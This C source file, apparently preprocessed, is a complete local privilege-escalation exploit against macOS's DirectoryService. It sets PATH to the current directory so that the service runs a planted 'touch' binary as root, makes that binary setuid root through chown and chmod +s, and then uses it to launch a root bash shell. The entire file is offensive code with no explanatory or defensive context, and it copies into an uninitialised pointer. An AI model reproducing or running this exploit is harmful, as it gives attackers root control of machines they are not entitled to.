
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int execl (char*,char*,int *) ;
 scalar_t__ fork () ;
 char* getenv (char*) ;
 scalar_t__ geteuid () ;
 int printf (char*,...) ;
 int setenv (char*,char*,int) ;
 int setuid (int ) ;
 int sleep (int) ;
 int strcpy (char*,char*) ;
 int system (char*) ;

int
main(int argc, char **argv)
{
 char *ORIGPATH;
 int temp;
 if (argc < 2) {
  if (geteuid() == 0) {
  printf("euid is root.\n");
  setuid(0);
  execl("/bin/bash", "bash", ((void*)0));
  }
  strcpy(ORIGPATH, getenv("PATH"));
  printf("Original path: %s\n", ORIGPATH);
  setenv("PATH", ".", 1);
  printf("New path: %s\n", getenv("PATH"));
  printf("Executing DirectoryService with false PATH...\n");
  if (fork() == 0) {
   execl("/usr/sbin/DirectoryService", "DirectoryService", ((void*)0));
  }
  printf("Forked DirectoryService, pausing before shell exec...\n");
  sleep(3);
  printf("Cross your fingers.\n");
  setenv("PATH", ORIGPATH, 1);
  printf("Path restored: %s\n", getenv("PATH"));
  execl("./touch", "touch", ((void*)0));
 }
system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
}
